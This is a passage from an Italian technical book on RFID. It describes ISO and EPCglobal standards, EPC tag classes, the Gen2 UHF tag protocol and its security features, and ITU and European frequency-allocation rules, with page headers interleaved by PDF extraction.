iniziando in modo indipendente un lavoro di standardizzazione sugliRFID. Questo può generare criticità nell’etichettatura di beni cinesi desti-nati oltreoceano, in quanto la Cina che esporta un grande volume di beni,è uno dei maggiori mercati potenziali della tecnologia RFID.Attualmente il “Ministry of Science and Technology (MOST)” cinese

ed altri 13 dipartimenti governativi, inclusi i “Ministry of InformationIndustry (MII)” ed il già citato SAC, hanno prodotto un “white paper”che traccia le linee guida per lo sviluppo degli RFID nel paese.L’amministrazione cinese ha incaricato il “National RFID Tags

Standards Working Group” di definire quale tecnologia debba essereadottata in Cina. Molto probabilmente verrà deciso di adottare qualcosa

2-parteVI.qxp:rfid 5-09-2008 10:59 Pagina 286

Page 275: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VI - STANDARD E PROTOCOLLI DI COMUNICAZIONE287

di compatibile con gli standard EPCglobal ed ISO, purché vengano ado-perati propri diritti sulla proprietà intellettuale in modo da ottenere stan-dard liberi da royalty.

LA NORMATIVA ISO ED EPCGLOBAL

I primi standard RFID sono stati realizzati in ISO, per TAG passivi abassa frequenza e comprendono:- Gli standard sui TAG per identificazione degli animali- ISO 11784- Radio frequency identification of animals - Code structure- ISO 11785- Radio frequency identification of animals - Technical concept

- Protocolli per l’interfaccia radio per TAG RFID usati nei sistemi dipagamento, smart cards senza contatti e carte di prossimità- ISO/IEC 10536- Identification cards -- Contactless integrated circuit(s) cards --- ISO/IEC 14443

- Identification cards - Contactless integrated circuit(s) cards -Proximity cards

- ISO/IEC 15693- Identification cards - Contactless integrated circuit(s) cards -Vicinity cards

- Metodi per il test e la conformità di TAG e Reader RFID ad uno stan-dard (ISO/IEC 18047);

- Metodi per il test delle prestazioni di TAG e Reader RFID (ISO/IEC18046).Successivamente EPCglobal ha prodotto normative orientate all’uso

dei TAG nella logistica, ovvero:• una tassonomia di classi di TAG;• standard per protocolli di comunicazione a radio frequenza tra TAG eReader;

• formato per la memorizzazione delle informazioni di identificazionenei TAG.

VI.1.4

2-parteVI.qxp:rfid 5-09-2008 10:59 Pagina 287

Page 276: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva288

Inoltre EPCglobal ha creato standard e specifiche per l’interconnessio-ne di sistemi informatici (server) che consentono di accedere ad informa-zioni complete su oggetti identificati tramite codici EPC, tramite i codiciEPC medesimi ottenuti dai TAG.Il tutto sulla falsariga dei sistemi per la risoluzione dei nomi simbolici

in Internet (DNS - Domain Nane Server). I sistemi informativi, detti“EPC Information Services” o EPCIS sono accessibili via Internet conservizi di rete per autorizzazione e sicurezza.Nel dicembre 2004, EPCglobal ha emesso uno standard lungamente

atteso per TAG operanti nelle banda UHF media, che promette la diffu-sione massiva di TAG passivi a basso costo ed alte prestazioni. Si tratta deicosiddetti Class 1 Generation 2 (EPC Gen2) RFID. Lo standard copre iprotocolli di comunicazione per l’interfaccia a radio frequenza e sta sti-molando lo sviluppo di nuove applicazioni.Il nuovo standard EPC Gen2, recentemente recepito dall’ISO

(ISO/IEC 18000-6 Type C), è destinato a superare le preoccupazioni del-l’utenza connesse ai diversi standard relativi a TAG per veicolare identifi-cativi EPC ed operanti nelle bande UHF. Si posiziona tra gli standard concarico lieve di diritti per brevetti (è comunque necessario, per ottenere laconformità allo standard di associarsi ad EPCGlobal).

2-parteVI.qxp:rfid 5-09-2008 10:59 Pagina 288

Page 277: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VI - STANDARD E PROTOCOLLI DI COMUNICAZIONE289

STANDARD EPCGLOBAL E LORO EVOLUZIONE

Vengono comunemente considerate altre tre classi di TAG, entramberelative ad apparati attivi o semi-passivi:- Classe 3 - READ/WRITE - TAG semi-passivi - con sensori a bordo -Applicazioni: Data logginQuesta classe, in aggiunta alle prestazioni della classe precedente, con-tiene, a bordo sensori e logica di controllo dei medesimi. I sensori piùdiffusi sono relativi alla pressione, moto o temperatura (i più diffusi inassoluto, per le esigenze logistiche della “catena del freddo”). Se la logi-ca di controllo dei sensori lo permette, questi possono essere letti e

VI.1.5

Tabella VI.1Classi di TAG come definite da EPC sulla basedella memoria del dispositivo e delle capacità

di trasmissione

2-parteVI.qxp:rfid 5-09-2008 10:59 Pagina 289

Page 278: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva290

registrati in memoria anche senza l’intervento del Reader che, quandointerrogherà il TAG si vedrà restituita anche la storia delle grandezzemisurate. Naturalmente la complessità circuitale ed il relativo consumodi energia richiedono TAG attivi o almeno semi-passivi.

- Classe 4 - READ/WRITE - con trasmittente a bordo - NetworkCapabilities - Applicazioni: Ad-Hoc Network; Active wireless sensornetworkQuesta classe di TAG, con trasmettitore a bordo, si comporta come unsistema dotato di logica autonoma, potendo comunicare da TAG aTAG senza la presenza del Reader. In questi casi non solo si è in pre-senza di TAG attivi, ma l’attività, e di conseguenza l’erogazione di ener-gia dalla batteria, permane anche in assenza di interrogazioni da partedel Reader.Per il resto sono previste tutte le prestazioni della classe 3.

- Classe 5 - READ/WRITE - con trasmittente a bordo - NetworkCapabilities.Oltre alla caratteristiche della classe 4 si ipotizza la possibilità di collo-quio con TAG passivi, con funzionalità del tipo di quelle degli NFC(cfr. §V.5).

Nota bene: i sistemi EAS (Electronic Article Surveillance: sistemi elet-tronici di sorveglianza dell'articolo, antitaccheggio) rappresentano i siste-mi più semplici. Questi sistemi verificano e controllano la presenza possi-bile di un TAG nella zona di interrogazione del lettore usando un sempli-ce risuonatore LC accordato ad una fissata frequenza, possono quindiessere realizzati praticamente senza chip.Sono detti anche 1-bit Tags nel senso che possono restituire solo una

informazione binaria (il TAG è/non è nella zona di copertura del Reader).Molto diffusi nei punti vendita al minuto, necessitano della rimozione

fisica dall’oggetto al quale sono associati prima che il cliente che lo haacquistato transiti attraverso il portale con le antenne del Reader, general-mente posto all’uscita del punto vendita.

2-parteVI.qxp:rfid 5-09-2008 10:59 Pagina 290

Page 279: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VI - STANDARD E PROTOCOLLI DI COMUNICAZIONE291

LA NORMATIVA GLOBALE ISO/IEC 18000VI.1.6

Tabella V.2Standard ISO/IEC 18000

2-parteVI.qxp:rfid 5-09-2008 10:59 Pagina 291

Page 280: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva292

Di recente, nel tentativo di porre fine alla competizione tra standard, l’ISOche costituisce in modo indiscusso l’ente mondiale di normativa, ha porta-to avanti uno standard costituito da più parti (ISO/IEC 18000) che defini-sce i protocolli di comunicazione per l’interfaccia radio per tutte le appli-cazioni e tutte le frequenze comunemente usate nel mondo per identifica-re gli oggetti nella catena di distribuzione e per ogni altra applicazione.In quest’ottica ISO cerca di incorporare gli standard EPCglobal e, in

particolare, ha recentemente incluso le specifiche EPCglobal Gen2, nellaserie ISO/IEC 18000 come ISO/IEC 18000-6 Type C.Nella tabella precedente sono sinteticamente descritte le parti principa-

li di cui si compone ISO/IEC 18000.

I TAG UHF GEN2Lo standard Gen2 (EPCglobal & ISO/IEC 18000-6) definisce una classedi TAG passivi, operanti in backscatter nelle frequenze 860÷960 MHz edin modalità HDX (Half Duplex, in cui il Reader parla per primo e conti-nua ad inviare la portante per fornire energia al TAG durante la risposta).Nelle bande consentite a livello regionale, i sistemi hanno a disposizio-

ne 50 canali di 500 kHz a 4 W di potenza negli USA (902÷928 MHz) e 10canali di 200 kHz a 2 W (più 5 a bassa potenza) in Europa (865÷868MHz). Da ciò deriva una rilevante diversità di approccio tecnico al pro-blema della possibile presenza di un numero rilevante di Reader nelmedesimo ambiente operativo, che si concretizza nell’uso di tecniche di“Frequency Hopping” oppure di “Listen Before Talk” – LBT, nell’inter-rogazione dei Reader medesimo. Il problema si manifesta quando il TAG,si configura come etichetta intelligente applicata ai singoli oggetti. Sempreim merito a questo stategia, il “Duty Cycle” può variare tra 48% e 82,3%in dipendenza delle tecniche usate (Frequency Hopping opp. LBT).Lo standard è stato sviluppato per superare le limitazioni delle specifiche

precedenti e costituisce la base normativa per una vasta produzione di TAGpassivi a basso costo nelle bande UHF. Questo dovrebbe prefigurare unasvolta nell’impiego degli RFID nelle applicazioni “open loop” per la logisti-ca ed il commercio, portando l’impiego del TAG a livello dei singoli oggetti.

VI.1.7

2-parteVI.qxp:rfid 5-09-2008 11:00 Pagina 292

Page 281: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VI - STANDARD E PROTOCOLLI DI COMUNICAZIONE293

Gen2 costituisce la prima tecnologia in banda UHF prodotta da tuttele maggiori aziende: Impinj, Philips, Texas Instruments e altri. Anche iproduttori di antenne, dispositivi di lettura/scrittura, stampan-ti/codificatori e computer industriali supportano lo standard Gen2 nelleloro linee di prodotti.Pur nell’estrema semplicità dell’elettronica associata ad un TAG passi-

vo, un TAG Gen2 riesce a realizzare una macchia a stati finiti abbastanzacomplessa in cui i comandi ricevuti dal Reader possono provocare, a

Figura VI.1Diagramma di stato dei TAG Gen2

[EPCglobal]

2-parteVI.qxp:rfid 5-09-2008 11:00 Pagina 293

Page 282: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva294

seconda dello stato corrente della macchina (TAG), risposte (al Reader) etransizioni di stato (della macchina – TAG) differenti. La complessitàdella macchina a stati del TAG è dovuta alla necessità di integrare in essatutte le funzioni del TAG medesimo; dalla generazione di sottoportanti inmodulazione, agli algoritmi anti-collisione, alle procedure di sicurezza,ecc. Prefornire un’idea della macchina a stati di un TAG Gen2 vieneriportata la Figura V.1, tratta dallo standard [EPC Global].Vengono ora riassunti alcuni aspetti chiave per i quali lo standard Gen2

ha identificato soluzioni di maggiore efficienza rispetto alle normativeprecedenti [29], [30]:• Modulazioni & CodificheLo standard prevede l’impiego da parte del TAG delle modulazioniASK e PSK (cfr. §IV.2) in modo indifferente (non esistono comandi diselezione ed i Reader devono ricevere entrambi). La PSK è stata inclu-sa perché massimizza il trasferimento di energia (utile nel versoReader=>TAG) e presenta migliori caratteristiche di robustezza alrumore (utile nel verso TAG=>Reader). Le codifiche di linea previstesono FM0 o Miller (cfr. §IV.1) con generazione di sottoportante attra-verso il parametro M. (cfr. §IV.1.3)Da parte del Reader possono essere impiegate DSB-ASK opp. SSB-ASK oppure PR-ASK con indice di modulazione del 90% e con codi-fica di linea PIE.

• MemoriaLo standard prevede una capacità di memoria non troppo dissimile daiTAG di classe 1 (EPCglobal). Da 96 a 512 bit di memoria nel TAGcontro i precedenti 64÷96 (comunque sufficienti a contenere l’EPC).L’aspetto più interessante consiste nella segmentazione della memoriaper contenere maggiori informazioni rispetto al semplice EPC e nellaprotezione (per segmenti) della memoria di cui si vedrà in seguito.

• Bitrate vs. identificazione dei TAGIn genere si riconosce ai TAG Gen2 una velocità superiore alle genera-zioni precedenti. I bitrate ammessi sono Reader =>TAG 26,7÷128kbit/s; TAG=>Reader 5÷640 kbit/s. I bitrate vengono gestiti dalReader nel momento in cui il TAG viene letto/scritto per ottimizzare la

2-parteVI.qxp:rfid 5-09-2008 11:00 Pagina 294

Page 283: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VI - STANDARD E PROTOCOLLI DI COMUNICAZIONE295

velocità di riconoscimento di TAG con l’affidabilità di trasmissione.Infatti con bitrate alti si aumenta la velocità dell’algoritmo anticollisio-ne, accelerando il riconoscimento dei TAG. Con bitrate bassi si favori-sce la robustezza del segnate verso il rumore. Nel verso TAG=>Readervengono usati 40÷640 kbit/s con codifica FM0 e 5÷320 kbit/s concodifica Miller.La velocità di lettura è funzione di diverse variabili che comprendonola potenza d’uscita, la densità dei TAG e l’ambiente operativo a radio-frequenza.Le specifiche Gen2 dovrebbero consentire ai Reader di effettuare, concirca 250 TAG nel raggio di copertura, circa 1500 letture di TAG alsecondo in Nord America, e 600 letture per secondo in Europa, dovela potenza irradiata, la banda e il “Duty Cycle” hanno limiti più stretti.Queste velocità di lettura supportano la capacità di identificare ogget-ti su nastri trasportatori in movimento o trasportati da carrelli elevato-ri in transito attraverso portali di lettura con velocità anche superiori ai10 Km/h.

• Efficienza spettraleVengono definiti tre modi operativi per i sistemi RFID: Reader singo-lo, Reader multipli, Reader multipli ad elevata densità.Le specifiche per i Reader che operano in ciascuno di tali ambientisono state concepite per fornire prestazioni maggiori rispetto a quelliesistenti.I TAG Gen2 possono essere letti e scritti da Reader di ognuna dellecategorie precedentemente elencate.La modalità operativa di Reader multipli ad elevata densità è la sceltapiù affidabile ma di maggior complessità; consente un uso efficientedella banda, ottimizza le prestazioni e protegge dalle interferenze.

• AffidabilitàSono previsti miglioramenti essenziali rispetto ai precedenti. Le nuovecaratteristiche mirano all’eliminazione di falsi positivi in lettura e ingenerale all’ottenimento di maggiore affidabilità nella lettura medesi-ma. Vi è anche la possibilità di introdurre meccanismi per incrementa-re le prestazioni in termini di integrità dei dati. Ad esempio è possibile

2-parteVI.qxp:rfid 5-09-2008 11:00 Pagina 295

Page 284: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva296

la verifica, dopo scrittura, dei dati in memoria del TAG (opzionale daparte del Reader).

• Raggio di coperturaLo standard Gen2 consente ma non obbliga l’uso di tecniche diFrequency Hopping prevedendo canali di 500 kHz nella banda asse-gnata negli USA (da 902,5 a 927,5 MHz).Tecniche alternative (Listen Before Talk – LBT) in uso in Europa pos-sono prevedere un “Duty Cycle” più breve e operare con meno poten-za, il che può comportare maggiore lentezza di lettura e un raggio dicopertura ridotto.Bisogna comunque ricordare che il massimo raggio di copertura èprincipalmente funzione della potenza irradiata. Poiché i limiti per talepotenza sono differenti per gli USA, l’Europa e il Giappone, ci si dovràaspettare valori differenti tra queste aree (in particolare i valori massi-mi in USA sono maggiori rispetto a quelli in Europa e Giappone).

• SicurezzaI TAG conformi allo standard Gen2 sono protetti da manomissioni. Ilcosiddetto “cloaking”, infatti, consente di configurare i TAG in modotale che prima di rispondere a qualunque interrogazione necessitano diricevere una password dal Reader. Password possono essere ancherichieste per scrivere i TAG o disabilitarli.Altro requisito di sicurezza supportato dallo standard e particolarmen-te richiesto è la possibilità di disabilitare definitivamente (“killing”) iTAG in modo tale che i loro dati non possano più essere accessibili.Questo è un requisito essenziale nell’ambito della vendita al dettaglioal fine di dissipare i timori dei consumatori riguardo la loro privacy.Sono definite password separate (a 32 bit) per il killing, per il cloaking,o per accedere alle diverse sezioni della memoria dei TAG. Maggioridettagli sono stati illustrati in §VIII.5.4.Esistono, nell’ambito dello standard, differenti possibilità per realizzarele caratteristiche di sicurezza addizionali, pertanto si può determinareuna forte differenziazione tra i prodotti conformi allo standard Gen2.

• Gestione dei TAGIl Reader gestisce la popolazione dei TAG nel proprio raggio di coper-

281-300.qxp:rfid 9-09-2008 11:02 Pagina 296

Page 285: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VI - STANDARD E PROTOCOLLI DI COMUNICAZIONE297

tura mediante 3 operazioni fondamentali, che comprendono uno o piùcomandi:- Selezione (Select); è il processo con il quale il Reader, sulla base dicriteri da lui stabiliti, seleziona gruppi o singoli TAG nella popola-zione. La selezione (che non implica risposte da parte dei TAG)avviene allo scopo di operare le successive operazioni di inventario.

- Inventario (Inventory); è il processo con il quale il Reader identificai TAG precedentemente selezionati. L’inventariazione avviene conprotocollo anticollisione e, in una prima fase, in modo anonimo (conl’uso di RN16 come pseudonimo o “Tag’s handle”).Successivamente (cfr.§VIII.5.4) il TAG invia l’idetificativo o l’EPC.

- Accesso (access); è il processo di accesso alla memoria del TAG peroperazioni di lettura e scrittura. Viene operato con le misure di sicu-rezza previste. In questa fase si ottengono l’identificativo, l’EPC o glialtri dati in memoria del TAG. Un particolare tipo di accesso è la dis-abilitazione definitiva del TAG (“killing”).

• Gestione del protocollo aticollisione (cfr.§IV.3.2.2)Nel protocollo slotted ALOHA impiegato per l’anticollisione, la lun-ghezza complessiva della trama, ovvero il numero degli slot tra i qualiil TAG sceglie di rispondere con algoritmo casuale, viene determinatodi volta in volta dal Reader (con il parametro Q, trasmesso ai TAG)sulla base delle condizioni al contorno.

• CostiUna delle maggiori spinte che hanno guidato lo sviluppo dello standardGen2 è stato quello di avere a disposizione una tecnologia RFID concosti tali da poter essere introdotta convenientemente nelle operazionipreviste nelle catene di distribuzione. Lo standard Gen2 raggiunge uncompromesso tra costo e funzionalità supportate che dovrebbero con-durre alla produzione di prodotti competitivi in termini di prezzo chesoddisfano le esigenze di applicazioni massive.

• Operatività “anywhere”Nei Gen2 è stato anche curato l’aspetto concernente il possibile funzio-namento del TAG a larga banda consentendo la compatibilità dell’in-terfaccia radio e delle tecniche di modulazione con le limitazioni della

Figura VI.2Azioni del Reader sui TAG e stati dei TAG

[EPCglobal]

281-300.qxp:rfid 9-09-2008 15:16 Pagina 297

Page 286: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva298

porzione di spettro UHF media assegnata agli RFID nelle varie areegeografiche. I TAG, quindi, devono poter operare tra 860 e 960 MHz.La capacità di operare a larga banda del chip conforme a Gen2, però,non implica necessariamente la piena operatività a langa banda dell’in-tero TAG. Lo standard, infatti, normalizza l’interfaccia radio ma non leantenne. Nei TAG di dimensioni più contenute e di prevalente impie-go regionale, pertanto, è possibile l’uso di antenne ottimizzate per unabanda stretta. Queste limitano le prestazioni al di fuori delle frequenzeconsentite nella regione di appartenenza del TAG.

• ConformitàGen2 costituisce un tipo standard dell’ultima generazione. Comeaccennato all’inizio del capitolo, per questo tipo di normativa il termi-ne “standard” non è tanto sinonimo di uguaglianza tra prodotti quan-to di razionalizazione della produzione dei prodotti medesimi. Diversecaratteristiche dello standard, infatti, sono opzionali e quindi non sonosupportate da tutti. Nei punti descritti in precedenza si sono menzio-nati casi che determinano considerevole differenziazione di prodottipur nell’ambito della conformità allo standard Gen 2. La focalizzazio-ne su esigenze reali dell’analisi di tali caratteristiche consentirà di sele-zionare il prodotto in grado di soddisfare maggiormente le prestazionirichieste dalla particolare applicazione, ma non sempre garantirà l’in-tercambiabilità, per l’applicazione medesima, di TAG di produttoridiversi.

• ComandiLo standard prevede un insieme di comandi (da Reader a TAG) alloscopo di selezionare le differenti funzioni del TAG. I comandi piùcomuni sono elencati nella tabella seguente:Esistono anche comandi “avanzati” quali: block write, truncated reply,multiple simultaneous singulation sessions with persistence, selectionfiltering flexibility, write protection.

2-parteVI.qxp:rfid 5-09-2008 11:00 Pagina 298

Page 287: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VI - STANDARD E PROTOCOLLI DI COMUNICAZIONE299

Tabella VI.3Principali comandi dello standard Gen2

2-parteVI.qxp:rfid 5-09-2008 11:00 Pagina 299

Page 288: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFIDFondamenti di una tecnologia silenziosamente pervasiva

PARTE VII

ALLOCAZIONE IN FREQUENZA

di Paolo Talone, Giuseppe RussoFondazione Ugo Bordoni

Questa parte è dedicata a problemi di fondamentale importanza per la tecnologiaRFID, come per tutte quelle basate sulla radiofrequenza: L’allocazione delle bande dello spettro radio alle applicazioni RFID Le potenze consentite nella trasmissione radio.L’articolazione della Parte VI è la seguente:- Vengono introdotte dapprima le problematiche internazionali, con particolare

attenzione alle diverse condizioni operative in Europa e negli Stati Uniti.– Successivamente viene illustrata la normativa europea, ponendo attenzione al

recente riordino delle bande assegnate agli RFID ed, in particolare,all’assegnazione della banda UHF, candidata ad ospitare applicazioni massiveper l’identificazione dei singoli oggetti.

– Infine viene illustrata nel dettaglio la normativa nazionale che storicamente facapo al “Piano Nazionale Ripartizione delle Frequenze”, ma che, di recente, èstata riordinata, recependo la nuova normativa europea.

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 301

Page 289: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

NORMATIVA MONDIALE

La normativa per allocazione in frequenza risale alla ripartizione interna-zionale delle frequenze stabilita dall’ITU (InternationalTelecommunications Union) che opera dividendo il pianeta in 3 differen-ti regioni (Figura VII.1). Considerando la separazione geografica, lagestione delle bande di frequenza viene spesso effettuata su base regiona-le. Può pertanto accadere che medesimi intervalli di frequenza sono desti-nati ad impieghi differenti in differenti regioni.

Gli apparati RFID, dal punto di vista dell’allocazione delle bande difrequenza, possono rientrare, a seconda della tecnologia impiegata, indiverse categorie:≡ “Inductive application” (SRD – Short Range Devices per applicazionidi tipo induttivo), ad indicare che si tratta di oggetti (passivi o attivi)che comunicano in prossimità per accoppiamento induttivo con trasfe-rimento di energia tramite campo magnetico (segnatamente TAG pas-sivi in HF/LF, NFC e simili).

≡ SRD (Short Range Devices), ad indicare che si tratta di oggetti checomunicano a radiofrequenza in prossimità. Rientrano nella categoriasia dispositivi passivi con trasferimento di energia tramite campo elet-

PARTE VII - ALLOCAZIONE IN FREQUENZA303

VII.1

Figura VII.1Regioni nella ripartizione internazionaledelle frequenze stabilita dall’ITU [58].

– Regione 1: Europa, Medio Oriente,Africa, Russia inclusa Siberia

– Regione 2: Nord America, Sud America,Est Pacifico fino a linea di cambiamentodi data

– Regione 3: Asia, Australia, Ovest Pacificofino a linea di cambiamento di data

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 303

Page 290: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

tromagnetico (anziché per accoppiamento induttivo), sia dispositiviattivi che comunicano a radiofrequenza con moduli di trasmissione e diricezione. Propriamente il termine “Short Range Device” (SRD) si rife-risce a sistemi che emettono radio frequenza e che forniscono unacomunicazione unidirezionale o bidirezionale causando (per la bassapotenza emessa) bassi livelli di interferenza ad altri dispositivi a radiofrequenza che operino sulle medesime bande.In teoria, entrambe, le tecnologie potrebbero essere usate su una mede-

sima banda di frequenza. In pratica le “Inductive application” fanno rife-rimento a frequenze al di sotto dei 27 MHz, mentre gli SRD fanno riferi-mento a frequenze al di sopra dei 27 MHz.≡ RFID solo di recente nella normativa internazionale per l’allocazione infrequenza è comparso esplicitamente il ternine RFID, in genere riferi-to a sistemi con TAG passivi ad accoppiamento elettromagnetico ope-ranti ad alta frequenza (UHF). Anche per gli oggetti classificati RFIDvale il principio di comunicazione di prossimità che causi bassi livelli diinterferenza ad altri dispositivi. Bisogna infine rilevare che molti altrisistemi comunemente classificati affini agli RFID (in particolare i TAGattivi, ZigBee e simili), operano come SRD.Questo genere di apparati normalmente non richiede licenza per esse-

re esercito, ma è comunque regolato, per quanto riguarda le bande di fre-quenze e le potenze permesse, da una legislazione spesso variabile dapaese a paese.Spesso (in Europa quasi sempre) gli apparati SRD ed RFID non ope-

rano su bande riservate in esclusiva, ma condividono bande usate ancheda altri servizi sulla base del citato principio di “non interferenza”.Questo principio si fonda sull’assunto che apparati a “corto raggio” emet-tano potenze RF di entità così modeste da generare un campo EM signi-ficativo solo in prossimità degli apparati e comunque tale da non interfe-rire con servizi che operino a lunga distanza. In Italia gli apparati a cortoraggio (SRD ed RFID) sono apparati radioelettrici destinati ad operare sufrequenze collettive, senza diritto a protezione e su base di non interferen-za con altri servizi, per collegamenti a breve distanza (Piano Nazionale diRipartizione delle Frequenze, PNRF, d.M.8 luglio 2002 [59]).

RFID - Fondamenti di una tecnologia silenziosamente pervasiva304

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 304

Page 291: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Il fatto che la tecnologia RFID venga classificata tra le tecnologie a“corto raggio” ai fini dell’allocazione in frequenza, fa emergere un altrotipo di criticità. Le bande dedicate a questo tipo di apparati, infatti, ven-gono allocate dagli organismi regionali (Europa, Usa, ecc.) tenendo contodi esigenze regionali. Questo può comportare che la medesima bandavenga allocata per usi differenti in differenti regioni.Per alcune applicazioni (smart card, identificazione di animali, ecc.)

una regolamentazione regionale non costituisce un problema. Per appli-cazioni di logistica, però, in cui gli RFID sono destinati a viaggiare con lemerci anche tra continenti diversi, la differente allocazione delle bandetra regione e regione comporta notevoli difficoltà per l’operatività“worldwide”.

SITUAZIONE NELLE BANDE DI FREQUENZA LF ED HF

Gli RFID ad accoppiamento indutivo, operanti nelle bande LF e HF,sono stati storicamente i primi ad essere realizzati ed anche le bande difrequenza sulle quali operano sono allocate in modo abbastanza compati-bile in tutto il mondo.Nelle bande LF le applicazioni più importanti sono quelle definite

dall’ISO per l’identificazione di animali relative ai TAG di tipo FDX a125 kHz ed HDX a 134,2 kHz. Queste bande, insieme a quella 140 –148,5 kHz sono utilizzabili sia in Europa che negli USA.In HF la banda maggiormente utilizzata è quella dei 13,56 MHz. Ad

oggi è la banda di frequenze sicuramente accettata in tutto il pianeta peruna grande varietà di applicazioni quali smart card per identificazione econtrollo accessi, identificatori elettronici di libri o pratiche cartacee, con-trollo bagagli negli aeroporti, identificazione di contenitori (pallet) nellalogistica, “etichette intelligenti” da associare agli oggetti.

SITUAZIONE NELLE BANDE DI FREQUENZA IN UHF MEDIA: ORGANISMITERRITORIALI

Le bande di frequenza in UHF media (approssimativamente tra 850

PARTE VII - ALLOCAZIONE IN FREQUENZA305

VII.1.1

VII.1.2

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 305

Page 292: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

MHz e 950 MHz), sono tra quelle maggiormente promettenti per leapplicazioni RFID, purtroppo sono anche allocate in modo differente daregione a regione.La banda UHF media costituisce infatti l’esempio più significativo di

allocazione regionale non omogenea per le applicazioni RFID. La banda,peraltro, costituisce quella attualmente più ricca di nuove realizzazioni diTAG passivi a basso costo per applicazioni di logistica (es. i nuovi TAGpassivi Gen2). La situazione mondiale è illustrata in Figura VII.2.Si noti come in Europa siano previsti 5 MHz di banda di cui 2 MHz

utilizzabili per applicazioni a 2W e.r.p., suddivisi in 10 canali con larghez-za di banda di 200 kHz. Negli USA, invece, sono disponibili 26 MHz a4 W E.I.R.P. (2,44 erp) con 63 canali da 400 kHz (due canali vuoti agliestremi come banda di guardia, oppure 50 canali da 500kHz per i TAGGen2).Degli svantaggi di questa situazione si è già detto in § I.3.3.Pertanto, in logistica, nessuna di queste bande può essere tranquilla-

mente utilizzata per applicazioni nella catena di distribuzione tra i varicontinenti, anche se i TAG UHFpiù moderni possono, con presta-zioni ridotte, rispondere a Readersu più bande superando l’inconve-niente.

1.2.1 Normativa mondiale delle

bande UHF

Nella tabella vengono illustrati ivari organismi preposti e lo statodei lavori.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva306

Figura VII.2Situazione mondiale dell’allocazionee delle potenze massime ammessenella banda tra 850 MHz-e 960 MHz

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 306

Page 293: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VII - ALLOCAZIONE IN FREQUENZA307

Tabella VII.1Situazione normativa mondiale

delle bande UHF

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 307

Page 294: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

NORMATIVA EUROPEA

La CEPT (European Conference of Postal and TelecommunicationsAdministrations) [60] ha la responsabilità dell’assegnazione delle fre-quenze e delle potenze di trasmissione. Essa ha carattere di associazionevolontaria tra gli Stati e non quello di trattato internazionale. È stata costi-tuita, come altre associazioni “regionali”, per cercare di aumentare ilpotere di difesa degli interessi europei nei consessi internazionali.Pubblica attraverso il suo organo ECC (Electronic Communications

Committee) ed in particolare attraverso l’Ufficio di quest’ultimo, l’ERO(European Radiocommunication Office), i documenti tecnici per l’alloca-zione dello spettro radio: le Raccomandazioni e le Decisioni.Le “Raccomandazioni” indicano la volontà della CEPT e definisconola pianificazione in merito all’allocazione dello spettro. Non sono, però,vincolanti per gli stati europei, che infatti le implementano con molteeccezioni e varianti nazionali.Il vincolo per le nazioni ad un comportamento uniforme deriva dalla

trasformazione delle raccomandazioni in Decisioni o Direttive della UE,esempi in tal senso sono:Le “Decisioni” dell’European Radiocommunications Committee(ECC/ERO, un tempo ERC/ERO) sull’allocazione delle frequenze, lecaratteristiche tecniche degli apparati, l’esenzione da licenze.Le Decisioni vengono prese per ciascuna banda o gruppo di bandedello spettro (con l’assistenza dell’ETSI).La Commissione Europea può incaricare la CEPT di studiare un deter-minato problema ed eventualmente emanare una Decisione; quando taleDecisione ritorna alla CE viene valutata l’opportunità di trasformala inuna Decisione o Direttiva CE. In altri casi è possibile decidere di esami-nare l’opportunità di recepire come Direttiva o Decisione CE una deci-sione emanata autonomamente dalla CEPT, qualora si ritenga che siainteresse generale che tutti i paesi dell’Unione uniformino il loro compor-tamento su una particolare applicazione o servizio. Quest’ultimo caso èquello della decisione sugli RFID in banda UHF di cui si dirà più avanti.• Nel processo di “adozione” la Commissione viene assistita dai pro-pri organi:

RFID - Fondamenti di una tecnologia silenziosamente pervasiva308

VII.2

2-parteVII.qxp:rfid 5-09-2008 11:00 Pagina 308

Page 295: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

− Il Radio Spectrum Committee (RSC), per assistere laCommissione nello sviluppo e nell’adozione di risoluzioni tecni-che per l’uso dello spettro radio.

− Il Radio Spectrum Policy Group (RSPG) che assiste laCommissione su temi riguardanti le politiche di gestione dellospettro radio.

• Una volta “adottata” la Decisione, questa viene avviata, dallaCommissione, al processo legislativo comunitario (codecisione) chesi conclude con l’approvazione da parte del Parlamento Europeo edel Consiglio, producendo un atto vincolante per gli stati membri.

